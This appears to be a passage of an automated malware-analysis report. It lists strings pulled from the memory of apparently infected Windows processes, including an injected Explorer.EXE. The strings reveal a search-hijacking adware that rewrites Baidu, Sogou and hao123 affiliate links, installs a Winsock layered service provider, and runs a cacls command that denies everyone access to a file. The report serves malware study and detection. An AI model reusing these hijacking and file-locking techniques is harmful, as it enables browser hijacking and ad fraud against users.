(xpsp_sp3_gdr.120228-1720)</pre><pre>6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)</pre><pre>6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)</pre><pre>6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)</pre><pre>6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)</pre><pre>6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)</pre><pre>6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)</pre><pre>6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)</pre><pre>6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)</pre><pre>6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)</pre><pre>6.00.3790.0 (srv03_rtm.030324-2048)</pre><pre>6.00.3790.118 (srv03_gdr.031205-1652)</pre><pre>6.00.3790.118 (srv03_qfe.031205-1652)</pre><pre>6.00.3790.1830 (srv03_sp1_rtm.050324-1447)</pre><pre>6.00.3790.186 (srv03_gdr.040410-1234)</pre><pre>6.00.3790.186 (srv03_qfe.040410-1236)</pre><pre>6.00.3790.2509 (srv03_sp1_gdr.050815-1517)</pre><pre>6.00.3790.2653 (srv03_sp1_gdr.060303-1536)</pre><pre>6.00.3790.2653 (srv03_sp1_qfe.060303-1552)</pre><pre>6.00.3790.2732 (srv03_sp1_gdr.060623-0310)</pre><pre>6.00.3790.2732 (srv03_sp1_qfe.060623-0318)</pre><pre>6.00.3790.2817 (srv03_sp1_gdr.061023-0100)</pre><pre>6.00.3790.2993 (srv03_sp1_gdr.070817-1316)</pre><pre>6.00.3790.2993 (srv03_sp1_qfe.070817-1316)</pre><pre>6.00.3790.3041 (srv03_sp1_gdr.071107-1901)</pre><pre>6.00.3790.3041 (srv03_sp1_qfe.071107-1901)</pre><pre>6.00.3790.3091 (srv03_sp1_gdr.080215-1206)</pre><pre>6.00.3790.3091 (srv03_sp1_qfe.080215-1206)</pre><pre>6.00.3790.3194 (srv03_sp1_gdr.080819-1207)</pre><pre>6.00.3790.3194 (srv03_sp1_qfe.080819-1207)</pre><pre>6.00.3790.3229 (srv03_sp1_gdr.081016-1620)</pre><pre>6.00.3790.3229 (srv03_sp1_qfe.081016-1620)</pre><pre>6.00.3790.3304 (srv03_sp1_gdr.090303-1204)</pre><pre>6.00.3790.3304 (srv03_sp1_qfe.090303-1204)</pre><pre>6.00.3790.3959 (srv03_sp2_rtm.070216-1710)</pre><pre>6.00.3790.4186 (srv03_sp2_gdr.071108-1306)</pre><pre>6.00.3790.4186 (srv03_sp2_qfe.071108-1306)</pre><pre>6.00.3790.4210 (srv03_sp2_qfe.071221-1418)</pre><pre>6.00.3790.4237 (srv03_sp2_gdr.080215-1206)</pre><pre>6.00.3790.4237 (srv03_sp2_qfe.080215-1206)</pre><pre>6.00.3790.4275 (srv03_sp2_gdr.080417-1307)</pre><pre>6.00.3790.4275 (srv03_sp2_qfe.080417-1307)</pre><pre>6.00.3790.4324 (srv03_sp2_qfe.080630-1205)</pre><pre>6.00.3790.4357 (srv03_sp2_gdr.080819-1207)</pre><pre>6.00.3790.4357 (srv03_sp2_qfe.080819-1207)</pre><pre>6.00.3790.4392 (srv03_sp2_gdr.081016-1620)</pre><pre>6.00.3790.4392 (srv03_sp2_qfe.081016-1620)</pre><pre>6.00.3790.4470 (srv03_sp2_gdr.090303-1204)</pre><pre>6.00.3790.4470 (srv03_sp2_qfe.090303-1204)</pre><pre>6.00.3790.4504 (srv03_sp2_gdr.090428-1405)</pre><pre>6.00.3790.4504 (srv03_sp2_qfe.090428-1405)</pre><pre>6.00.3790.4539 (srv03_sp2_gdr.090626-1428)</pre><pre>6.00.3790.4539 (srv03_sp2_qfe.090626-1428)</pre><pre>6.00.3790.4589 (srv03_sp2_gdr.090914-1233)</pre><pre>6.00.3790.4589 (srv03_sp2_qfe.090914-1233)</pre><pre>6.00.3790.4672 (srv03_sp2_gdr.100225-1230)</pre><pre>6.00.3790.4672 (srv03_sp2_qfe.100225-1230)</pre><pre>6.00.3790.4696 (srv03_sp2_gdr.100419-1942)</pre><pre>6.00.3790.4732 (srv03_sp2_gdr.100623-0356)</pre><pre>6.00.3790.4732 (srv03_sp2_qfe.100623-0356)</pre><pre>6.00.3790.4772 (srv03_sp2_gdr.100908-1010)</pre><pre>6.00.3790.4772 (srv03_sp2_qfe.100908-1010)</pre><pre>6.00.3790.4795 (srv03_sp2_qfe.101103-0357)</pre><pre>6.00.3790.4807 (srv03_sp2_gdr.101220-0307)</pre><pre>6.00.3790.4807 (srv03_sp2_qfe.101220-0307)</pre><pre>6.00.3790.4835 (srv03_sp2_gdr.110222-0239)</pre><pre>6.00.3790.4835 (srv03_sp2_qfe.110222-0239)</pre><pre>6.00.3790.4857 (srv03_sp2_gdr.110425-0335)</pre><pre>6.00.3790.4857 (srv03_sp2_qfe.110425-0335)</pre><pre>6.00.3790.4879 (srv03_sp2_gdr.110621-0342)</pre><pre>6.00.3790.4879 (srv03_sp2_qfe.110621-0342)</pre><pre>6.00.3790.4904 (srv03_sp2_gdr.110905-0334)</pre><pre>6.00.3790.4904 (srv03_sp2_qfe.110905-0334)</pre><pre>6.00.3790.4929 (srv03_sp2_gdr.111104-0342)</pre><pre>6.00.3790.4929 (srv03_sp2_qfe.111104-0342)</pre><pre>6.00.3790.4944 (srv03_sp2_gdr.111216-0308)</pre><pre>6.00.3790.4944 (srv03_sp2_qfe.111216-0308)</pre><pre>6.00.3790.4969 (srv03_sp2_gdr.120228-0234)</pre><pre>6.00.3790.4969 (srv03_sp2_qfe.120228-0234)</pre><pre>6.00.3790.5004 (srv03_sp2_gdr.120515-0336)</pre><pre>6.00.3790.5004 (srv03_sp2_qfe.120515-0336)</pre><pre>6.00.3790.5029 (srv03_sp2_gdr.120628-0335)</pre><pre>6.00.3790.5029 (srv03_sp2_qfe.120628-0335)</pre><pre>6.00.3790.5060 (srv03_sp2_gdr.120824-0334)</pre><pre>6.00.3790.5060 (srv03_sp2_qfe.120824-0334)</pre><pre>6.00.3790.5080 (srv03_sp2_gdr.121026-1534)</pre><pre>6.00.3790.5080 (srv03_sp2_qfe.121026-1534)</pre><pre>HTTP/1.</pre><pre>HTTP/1.1 302 Moved Temporarily</pre><pre>http://www.baidu.com/s? tn=</pre><pre>http://www.baidu.com/</pre><pre>http://www.sogou.com/sogou? pid=</pre><pre>http://www.sogou.com/index. pid=</pre><pre>http://rlt.inte.sogou.com/</pre><pre><html><head><meta http-equiv="refresh" content="0;url=</pre><pre>[i 1]){b.href=</pre><pre>[i]==b.id){if (b.href!=</pre><pre>.length;i =2){if (</pre><pre>&cmv=X</pre><pre>window.sogou_adclk</pre><pre>http://www.baidu.com/ tn=-wd=-word=</pre><pre>tn=%s</pre><pre>http://www.hao123.com/ tn=</pre><pre>.google.com</pre><pre>pv.sogou.com</pre><pre>pb.sogou.com</pre><pre>.tanghulu.cc</pre><pre>.zclm8.com</pre><pre>.wq581.com</pre><pre>.maimeng8.com</pre><pre>.5sla.com</pre><pre>.wb360.net</pre><pre>.renren.com</pre><pre>.jj123.com.cn</pre><pre>.iwb110.com</pre><pre>.wb12318.com</pre><pre>.woai310.com</pre><pre>.58lianmeng.com</pre><pre>dwVAOffset:X</pre><pre>.data</pre><pre>.text</pre><pre>FILE_EXECUTE</pre><pre>FILE_GENERIC_EXECUTE</pre><pre>GENERIC_EXECUTE</pre><pre>%Program Files%\Common Files\mdhc\dsau.exe</pre><pre>%System%\DqKgbb.dll</pre><pre>{6795ED75-58AA-8E4C-A8EA-3CAD7C47AB03}</pre><pre>http://index.woai310.com/index.htm?u=52097</pre><pre>GetProcessHeap</pre><pre>WinExec</pre><pre>GetCPInfo</pre><pre>RegDeleteKeyA</pre><pre>RegQueryInfoKeyA</pre><pre>RegEnumKeyExA</pre><pre>RegCreateKeyExA</pre><pre>RegCreateKeyA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>UrlUnescapeA</pre><pre>EnumWindows</pre><pre>SetWindowsHookExA</pre><pre>EnumChildWindows</pre><pre>InternetCanonicalizeUrlA</pre><pre>InternetCrackUrlA</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.DLL</pre><pre>iphlpapi.dll</pre><pre>OLEAUT32.dll</pre><pre>PSAPI.DLL</pre><pre>USER32.dll</pre><pre>VERSION.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>Loader.dll</pre><pre>{9a4dda61-1d3a-49b7-9849-dac6cd30a393}</pre><pre>AutoConfigURL</pre><pre>_IID_IWEBBROWSER</pre><pre>MSAFD Tcpip [TCP/IP]</pre><pre>MSAFD Tcpip [UDP/IP]</pre><pre>MSAFD Tcpip [RAW/IP]</pre><pre>RSVP UDP Service Provider</pre><pre>\Device\NetBT_Tcpip</pre><pre>RSVP TCP Service Provider</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2</pre><pre>ikeeper.dll</pre><pre>rsvpsp.dll</pre><pre>nwprovau.dll</pre><pre>winrnr.dll</pre><b>dsau.exe_3672_rwx_10001000_0002E000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>PSAPI.DLL</pre><pre>i4VO.Wn}}4</pre><pre>uJ 9%d</pre><pre>s%F'`f</pre><pre>vp%Cl }F.</pre><pre>.Lu.-$ A</pre><pre>>%FZ7~</pre><pre>.DcPn%*</pre><pre>HN6.QK</pre><pre>KERNEL32.DLL</pre><pre>ADVAPI32.dll</pre><pre>iphlpapi.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHLWAPI.dll</pre><pre>USER32.dll</pre><pre>VERSION.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>Loader.dll</pre><pre>Base:X</pre><pre>DLL_PROCESS_ATTACH %d</pre><pre>Length:%d opcode X offset:%d</pre><pre>MsgDebugView</pre><pre>%System%\DqKgbb.dll</pre><pre>%Program Files%\Common Files\mdhc\dsau.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><b>acsvc.exe_2168:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.vmp0</pre><pre>.vmp1</pre><pre>.reloc</pre><pre>@.rsrc</pre><pre>{;g.BN</pre><pre>eHzeHa%c</pre><pre>-v}?b</pre><pre>D,%u~</pre><pre>0.OX8c<</pre><pre>nmo.Ox</pre><pre>@C'.eZ=V</pre><pre>OLEACC.dll</pre><pre>OLEAUT32.dll</pre><pre>0%F^@</pre><pre>SHELL32.dll</pre><pre>USER32.dll</pre><pre>7-757:7^7</pre><pre>8$8)8.838<8</pre><pre>2 2,20242</pre><pre>6$6@6\6`6</pre><pre>3Z3M4</pre><pre>KERNEL32.dll</pre><pre>PSAPI.DLL</pre><pre>user32.dll</pre><pre>ShellExecuteW</pre><pre>UnhookWindowsHookEx</pre><pre>Pk.PR</pre><pre>CmdEs</pre><pre>%C``ZL!</pre><pre>.AndP</pre><pre>p.IKCb</pre><pre>bL`%XV</pre><pre>WQ.re|</pre><pre>J.BgO6!,</pre><pre>R.XnO</pre><pre>Tzs%x</pre><pre>G.ji></pre><pre>[i-</pre><pre>3%fxI#G</pre><pre>T.dqP</pre><pre>9t<%c</pre><pre>F[.vn5</pre><pre>%@>'.w%uEs@,</pre><pre>x.UVw</pre><pre>sWeb(</pre><pre>.3}%d</pre><pre>kJU%x</pre><pre>SS%c@&</pre><pre>L-%C~h</pre><pre> {.Kl</pre><pre>j%c 21</pre><pre>.LHq;</pre><pre>~%-.OX</pre><pre>i.UQ!</pre><pre>7%x@T</pre><pre>.wC4C</pre><pre>Wm%c=</pre><pre>H.yxis%/</pre><pre>z^jN</pre><pre>^zg8%s</pre><pre>&.Ef1i</pre><pre>J;%us</pre><pre>.PJ=.</pre><pre>5.RrQu(.D</pre><pre><-%X3</pre><pre>o.vs@c^</pre><pre>}f5%F</pre><pre><requestedExecutionLevel level='requireAdministrator' uiAccess='false' /></pre><b>acsvc.exe_2168_rwx_0062E000_00001000:</b><pre>0%F^@</pre><b>acsvc.exe_2168_rwx_00BB0000_00053000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>iexplore.exe</pre><pre>%Program Files%\Internet Explorer\iexplore.exe</pre><pre>explorer.exe</pre><pre>igfxsrvc.exe</pre><pre>{5D562E5F-741F-4b50-AB7B-7A997CEB9557}</pre><pre>{XXXX-XX-XX-XX-XXXXXX}</pre><pre>cacls.exe " %s /><pre>[i 1]){b.href=</pre><pre>[i]==b.id){if (b.href!=</pre><pre>.length;i =2){if (</pre><pre>&cmv=X</pre><pre>window.sogou_adclk</pre><pre>http://www.baidu.com/ tn=-wd=-word=</pre><pre>tn=%s</pre><pre>http://www.hao123.com/ tn=</pre><pre>.google.com</pre><pre>pv.sogou.com</pre><pre>pb.sogou.com</pre><pre>.tanghulu.cc</pre><pre>.zclm8.com</pre><pre>.wq581.com</pre><pre>.maimeng8.com</pre><pre>.5sla.com</pre><pre>.wb360.net</pre><pre>.renren.com</pre><pre>.jj123.com.cn</pre><pre>.iwb110.com</pre><pre>.wb12318.com</pre><pre>.woai310.com</pre><pre>.58lianmeng.com</pre><pre>dwVAOffset:X</pre><pre>.data</pre><pre>.text</pre><pre>FILE_EXECUTE</pre><pre>FILE_GENERIC_EXECUTE</pre><pre>GENERIC_EXECUTE</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RarLhr\acsvc.exe</pre><pre>%System%\DqKgbb.dll</pre><pre>{6795ED75-58AA-8E4C-A8EA-3CAD7C47AB03}</pre><pre>http://index.woai310.com/index.htm?u=52097</pre><pre>GetProcessHeap</pre><pre>WinExec</pre><pre>GetCPInfo</pre><pre>RegDeleteKeyA</pre><pre>RegQueryInfoKeyA</pre><pre>RegEnumKeyExA</pre><pre>RegCreateKeyExA</pre><pre>RegCreateKeyA</pre><pre>RegOpenKeyA</pre><pre>RegCloseKey</pre><pre>UrlUnescapeA</pre><pre>EnumWindows</pre><pre>SetWindowsHookExA</pre><pre>EnumChildWindows</pre><pre>InternetCanonicalizeUrlA</pre><pre>InternetCrackUrlA</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>KERNEL32.DLL</pre><pre>iphlpapi.dll</pre><pre>OLEAUT32.dll</pre><pre>PSAPI.DLL</pre><pre>USER32.dll</pre><pre>VERSION.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>Loader.dll</pre><pre>{9a4dda61-1d3a-49b7-9849-dac6cd30a393}</pre><pre>AutoConfigURL</pre><pre>_IID_IWEBBROWSER</pre><pre>MSAFD Tcpip [TCP/IP]</pre><pre>MSAFD Tcpip [UDP/IP]</pre><pre>MSAFD Tcpip [RAW/IP]</pre><pre>RSVP UDP Service Provider</pre><pre>\Device\NetBT_Tcpip</pre><pre>RSVP TCP Service Provider</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2</pre><pre>MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2</pre><pre>ikeeper.dll</pre><pre>rsvpsp.dll</pre><pre>nwprovau.dll</pre><pre>winrnr.dll</pre><b>acsvc.exe_2168_rwx_10001000_0002E000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>PSAPI.DLL</pre><pre>i4VO.Wn}}4</pre><pre>uJ 9%d</pre><pre>s%F'`f</pre><pre>vp%Cl }F.</pre><pre>.Lu.-$ A</pre><pre>>%FZ7~</pre><pre>.DcPn%*</pre><pre>HN6.QK</pre><pre>KERNEL32.DLL</pre><pre>ADVAPI32.dll</pre><pre>iphlpapi.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHLWAPI.dll</pre><pre>USER32.dll</pre><pre>VERSION.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>Loader.dll</pre><pre>Base:X</pre><pre>DLL_PROCESS_ATTACH %d</pre><pre>Length:%d opcode X offset:%d</pre><pre>MsgDebugView</pre><pre>%System%\DqKgbb.dll</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RarLhr\acsvc.exe</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><b>Explorer.EXE_1752_rwx_00FF0000_00004000:</b><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\EXE_temp0.exe</pre><pre>wmsvcrt</pre><pre>WinExec</pre><pre>ShellExecuteExA</pre><pre>ShellExecuteExW</pre><pre>OpenWindowStationA</pre><pre>OpenWindowStationW</pre><pre>SetProcessWindowStation</pre><pre>GetProcessWindowStation</pre><pre>CloseWindowStation</pre><pre>EnumWindows</pre><pre>EnumThreadWindows</pre><pre>EnumChildWindows</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExA</pre><pre>RegEnumKeyExW</pre><pre>RegDeleteKeyA</pre><pre>RegDeleteKeyW</pre><pre>RegCloseKey</pre><pre>HttpOpenRequestA</pre><pre>HttpOpenRequestW</pre><pre>HttpEndRequestA</pre><pre>HttpEndRequestW</pre><pre>HttpQueryInfoA</pre><pre>HttpQueryInfoW</pre><pre>UrlUnescapeA</pre><pre>UrlUnescapeW</pre><b>Explorer.EXE_1752_rwx_01D80000_00005000:</b><pre>%WinDir%\JMt\win32\rename.exe</pre><pre>%Program Files%\tango3\tango3.exe</pre><pre>wmsvcrt</pre><pre>WinExec</pre><pre>ShellExecuteExA</pre><pre>ShellExecuteExW</pre><pre>OpenWindowStationA</pre><pre>OpenWindowStationW</pre><pre>SetProcessWindowStation</pre><pre>GetProcessWindowStation</pre><pre>CloseWindowStation</pre><pre>EnumWindows</pre><pre>EnumThreadWindows</pre><pre>EnumChildWindows</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExA</pre><pre>RegEnumKeyExW</pre><pre>RegDeleteKeyA</pre><pre>RegDeleteKeyW</pre><pre>RegCloseKey</pre><pre>HttpOpenRequestA</pre><pre>HttpOpenRequestW</pre><pre>HttpEndRequestA</pre><pre>HttpEndRequestW</pre><pre>HttpQueryInfoA</pre><pre>HttpQueryInfoW</pre><pre>UrlUnescapeA</pre><pre>UrlUnescapeW</pre><b>Explorer.EXE_1752_rwx_01E61000_0002F000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>user32.dll</pre><pre>PSAPI.DLL</pre><pre>i4VO.Wn}}4</pre><pre>uJ 9%d</pre><pre>s%F'`f</pre><pre>vp%Cl }F.</pre><pre>.Lu.-$ A</pre><pre>>%FZ7~</pre><pre>.DcPn%*</pre><pre>HN6.QK</pre><pre>KERNEL32.DLL</pre><pre>ADVAPI32.dll</pre><pre>iphlpapi.dll</pre><pre>ole32.dll</pre><pre>OLEAUT32.dll</pre><pre>SHLWAPI.dll</pre><pre>USER32.dll</pre><pre>VERSION.dll</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>Loader.dll</pre><pre>Base:X</pre><pre>DLL_PROCESS_ATTACH %d</pre><pre>Length:%d opcode X offset:%d</pre><pre>MsgDebugView</pre><pre>%System%\DqKgbb.dll</pre><pre>%WinDir%\Explorer.EXE</pre><pre>GetProcessHeap</pre><pre>GetCPInfo</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><b>Explorer.EXE_1752_rwx_020C0000_00053000:</b><pre>__MSVCRT_HEAP_SELECT</pre><pre>inflate 1.2.3 Copyright 1995-2005 Mark Adler</pre><pre>iexplore.exe</pre><pre>%Program Files%\Internet Explorer\iexplore.exe</pre><pre>explorer.exe</pre><pre>igfxsrvc.exe</pre><pre>{5D562E5F-741F-4b50-AB7B-7A997CEB9557}</pre><pre>{XXXX-XX-XX-XX-XXXXXX}</pre><pre>cacls.exe "%s" /e /d everyone</pre><pre>%Program Files%\E-yoo\EyooSechelper2.dll</pre><pre>http://</pre><pre>XXXXXXXXXXXXXXXX</pre><pre>Software\Microsoft\Windows\ShellNoRoam\TempCache</pre><pre>Software\Microsoft\Windows\ShellNoRoam\ShellCache</pre><pre>herollq.exe</pre><pre>WebPlayer2010.exe</pre><pre>VODPlayer.exe</pre><pre>JSKPBrowser.exe</pre><pre>ValeBrowser.exe</pre><pre>wmconfig.exe</pre><pre>NewBho.DLL</pre><pre>\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object</pre><pre>software\policies\microsoft\windows nt\dnsclient</pre><pre>ws2_32.dll</pre><pre>ole32.dll</pre><pre>ieui.dll</pre><pre>mshtml.dll</pre><pre>IEFrame.dll</pre><pre>iertutil.dll</pre><pre>User32.dll</pre><pre>SHLWAPI.dll</pre><pre>wininet.dll</pre><pre>urlmon.dll</pre><pre>mswsock.dll</pre><pre>ws2help.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyExW</pre><pre>NtQueryValueKey</pre><pre>NtOpenKey</pre><pre>ADVAPI32.dll</pre><pre>ntdll.dll</pre><pre>Kernel32.dll</pre><pre>dnsapi.dll</pre><pre>msvcrt</pre><pre>PubwinClient.exe</pre><pre>RunMe.exe</pre><pre>{11F09AFE-75AD-4E52-AB43-E09E9351CE17}</pre><pre>Shell.User\Group</pre><pre>oleaut32.dll</pre><pre>browseti.dll</pre><pre>hinthk.dll</pre><pre>zclm8.com</pre><pre>wq581.com</pre><pre>maimeng8.com</pre><pre>5sla.com</pre><pre>wb360.net</pre><pre>renren.com</pre><pre>jj123.com.cn</pre><pre>wb12318.com</pre><pre>iwb110.com</pre><pre>woai310.com</pre><pre>http://123.sogou.com</pre><pre>http://www.sogou.com/sogou</pre><pre>http://www.sogou.com/index</pre><pre>.info</pre><pre>http://baidu.com</pre><pre>{X-X-x-XX-XXXXXX}</pre><pre>www.soso.com</pre><pre>www.google.com</pre><pre>www.hao123.com</pre><pre>www.tao123.com</pre><pre>www.baidu.com</pre><pre>123.sogou.com</pre><pre>www.sogou.com</pre><pre>www.iwb110.com</pre><pre>rpcrt4.dll</pre><pre>kernel32.dll</pre><pre>{xxxx-xx-xx-xx-xxxxxx}</pre><pre>127.0.0.1</pre><pre>208.67.222.222</pre><pre>208.67.220.220</pre><pre>114.114.114.114</pre><pre>114.114.115.115</pre><pre>8.8.8.8</pre><pre>8.8.8.9</pre><pre>8.8.4.4</pre><pre>Shell.Dusn</pre><pre>1.2.3</pre><pre>User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>bytes=%d-%d</pre><pre>bytes=%d-</pre><pre>HTTP/</pre><pre>HTTP/</pre><pre>ZwQueryValueKey</pre><pre>ZwOpenKey</pre><pre>SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}</pre><pre>xxxxxx</pre><pre>http://www.baidu.com/adrc.php?</pre><pre>http://www.baidu.com/baidu.php?</pre><pre>http://www.baidu.com/s?</pre><pre>http://www.hao123.com/?</pre><pre>http://123.sogou.com/?</pre><pre>http://www.sogou.com/img/fav.ico?</pre><pre>http://pv.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/pv.gif?</pre><pre>http://pb.sogou.com/cl.gif?</pre><pre>http://www.google.com/aclk?</pre><pre>http://www.sogou.com/bill_</pre><pre>http://www.sogou.com/sogou?</pre><pre>http://test.hermes.sogou.com/sa.gif?</pre><pre>http://www.sogou.com/index.htm</pre><pre>118.145.16.80</pre><pre>%SystemRoot%\System32\mswsock.dll</pre><pre>Tcpip</pre><pre>SupportedNameSpace</pre><pre>%SystemRoot%\System32\winrnr.dll</pre><pre>%SystemRoot%\system32\mswsock.dll</pre><pre>%SystemRoot%\system32\rsvpsp.dll</pre><pre>|%SystemRoot%\system32\rsvpsp.dll</pre><pre>000000000011</pre><pre>000000000010</pre><pre>000000000009</pre><pre>000000000008</pre><pre>000000000007</pre><pre>000000000006</pre><pre>000000000005</pre><pre>000000000004</pre><pre>000000000003</pre><pre>000000000002</pre><pre>000000000001</pre><pre>shdocvw.dll</pre><pre>ieframe.dll</pre><pre>http://www.sogou.com/sogou?query=</pre><pre>sogou-netb-xx-d</pre><pre>%%X</pre><pre>HttpAddRequestHeadersW</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>HttpOpenRequestW</pre><pre>HttpOpenRequestA</pre><pre>HttpAddRequestHeaders</pre><pre>\StringFileInfo\xx\%s</pre><pre>user32.dll</pre><pre>6.0.2800.1106</pre><pre>6.00.2600.0000</pre><pre>6.00.2600.0000 (xpclient.010817-1148)</pre><pre>6.00.2737.800</pre><pre>6.00.2800.1106</pre><pre>6.00.2800.1106 (xpsp1.020828-1920)</pre><pre>6.00.2800.1400</pre><pre>6.00.2800.1485</pre><pre>6.00.2800.1496</pre><pre>6.00.2800.1603</pre><pre>6.00.2800.1607</pre><pre>6.00.2800.1611</pre><pre>6.00.2800.1615</pre><pre>6.00.2800.1617</pre><pre>6.00.2800.1623</pre><pre>6.00.2800.1627</pre><pre>6.00.2800.1632</pre><pre>6.00.2800.1644</pre><pre>6.00.2800.1649</pre><pre>6.00.2800.1650</pre><pre>6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)</pre><pre>6.00.2900.2518 (xpsp.040919-1030)</pre><pre>6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)</pre><pre>6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)</pre><pre>6.00.2900.2598 (xpsp.041130-1728)</pre><pre>6.00.2900.2627 (xpsp.050309-1719)</pre><pre>6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)</pre><pre>6.00.2900.2668 (xpsp.050430-1553)</pre><pre>6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)</pre><pre>6.00.2900.2713 (xpsp.050702-1518)</pre><pre>6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)</pre><pre>6.00.2900.2753 (xpsp.050902-1331)</pre><pre>6.00.2900.2781 (xpsp.051020-1728)</pre><pre>6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)</pre><pre>6.00.2900.2823 (xpsp.060106-1527)</pre><pre>6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)</pre><pre>6.00.2900.2861 (xpsp.060303-1528)</pre><pre>6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)</pre><pre>6.00.2900.2904 (xpsp.060509-0230)</pre><pre>6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)</pre><pre>6.00.2900.2937 (xpsp.060623-0011)</pre><pre>6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)</pre><pre>6.00.2900.2995 (xpsp.060913-0019)</pre><pre>6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)</pre><pre>6.00.2900.3020 (xpsp.061023-0222)</pre><pre>6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)</pre><pre>6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)</pre><pre>6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)</pre><pre>6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)</pre><pre>6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)</pre><pre>6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)</pre><pre>6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)</pre><pre>6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)</pre><pre>6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)</pre><pre>6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)</pre><pre>6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)</pre><pre>6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)</pre><pre>6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)</pre><pre>6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)</pre><pre>6.00.2900.3268 